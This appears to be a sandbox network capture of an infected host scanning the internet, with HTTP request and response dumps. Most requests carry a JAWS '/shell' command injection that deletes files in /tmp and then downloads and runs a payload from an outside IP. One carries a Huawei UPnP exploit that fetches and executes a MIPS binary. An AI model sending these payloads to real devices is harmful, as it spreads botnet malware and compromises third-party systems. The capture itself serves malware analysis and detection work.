                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { height: 100%; font-family: Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff; box-sizing: border-box; padding: 2px .5em; appearance: none;
                                                            Jan 26, 2024 15:32:11.959109068 CET1286INData Raw: 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72
                                                            Data Ascii: border-radius: 0; } input:focus { border-color: #646464; box-shadow: 0 0 1px 0 #a2a2a2; outline: 0; } button { padding: .5em 1em;
                                                            Jan 26, 2024 15:32:11.959125042 CET1286INData Raw: 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 62 6c 65 20 3e 20 74 62 6f 64 79 20 3e 20 74 72 20 3e 20 74 64 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 20 7b 0a
                                                            Data Ascii: rgba(0,0,0,.5); } table > tbody > tr > td:first-of-type { vertical-align: top; } table > tbody > tr > td { padding: .3em .3em; } .field {
                                                            Jan 26, 2024 15:32:11.959141016 CET761INData Raw: 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 74 65 78 74 2d 63 65 6e 74 65 72 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: font-size: 1em; } .text-centered { text-align: center; } .text-container { margin: 1em 1.5em; } .flex-container {


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            356192.168.2.2355592103.67.246.15980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.805602074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:12.172005892 CET419INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:37:33 GMT
                                                            Server: Apache/2.4.6 (CentOS)
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            357192.168.2.23387662.21.34.9480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.844043016 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:12.042953968 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:11 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:11 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 65 32 32 31 35 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 33 31 26 23 34 36 3b 32 37 31 66 33 66 36 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5e221502&#46;1706279531&#46;271f3f6c</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            358192.168.2.2339958197.246.45.20137215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.998768091 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:12.298044920 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            359192.168.2.234804289.232.184.7080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:12.076458931 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:12.371309996 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 26 Jan 2024 14:32:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            360192.168.2.2359052134.236.63.4980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:12.175744057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:12.547580957 CET322INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            361192.168.2.2336268100.27.4.9880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:12.669265985 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:12.785145998 CET512INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:12 GMT
                                                            Server: Apache/2.4.18 (Ubuntu)
                                                            Content-Length: 318
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6c 61 62 74 6f 6f 6c 73 2e 72 65 73 65 61 72 63 68 73 70 61 63 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at labtools.researchspace.com Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            362192.168.2.2353952107.22.76.4180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:12.670691967 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            363192.168.2.235981423.32.96.480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:12.871881962 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:13.074776888 CET429INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 207
                                                            Expires: Fri, 26 Jan 2024 14:32:12 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:12 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 65 31 63 31 32 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 33 32 26 23 34 36 3b 63 37 35 31 61 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9e1c1202&#46;1706279532&#46;c751a4</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            364192.168.2.235805247.103.45.3180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:13.113445997 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:13.446901083 CET463INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:13 GMT
                                                            Server: Apache
                                                            Content-Length: 285
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            365192.168.2.2350172211.149.134.21380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:13.187329054 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:13.550877094 CET195INHTTP/1.1 302 Object moved
                                                            Server: infosec/1.0.0
                                                            Location: http://stopinfo.vhostgo.com/info5.html?data=127.0.0.1
                                                            Connection: close
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 0
                                                            Jan 26, 2024 15:32:13.551009893 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:12 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            366192.168.2.2343066164.42.149.25280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:14.712104082 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            367192.168.2.2349264101.33.8.22880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:14.795064926 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:15.021109104 CET164INHTTP/1.1 418 Unknown Status
                                                            Content-Length: 0
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:32:14 GMT
                                                            Server: TencentEdgeOne
                                                            EO-LOG-UUID: 4008213193847415762
                                                            Jan 26, 2024 15:32:15.140073061 CET1INData Raw: 0d
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            368192.168.2.2351118172.66.135.15480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:14.830379009 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            369192.168.2.2357494106.52.149.2580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:14.899766922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:15.225630999 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:15 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            370192.168.2.233620423.194.56.7480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:14.932097912 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:15.285470009 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:15 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:15 GMT
                                                            Connection: close
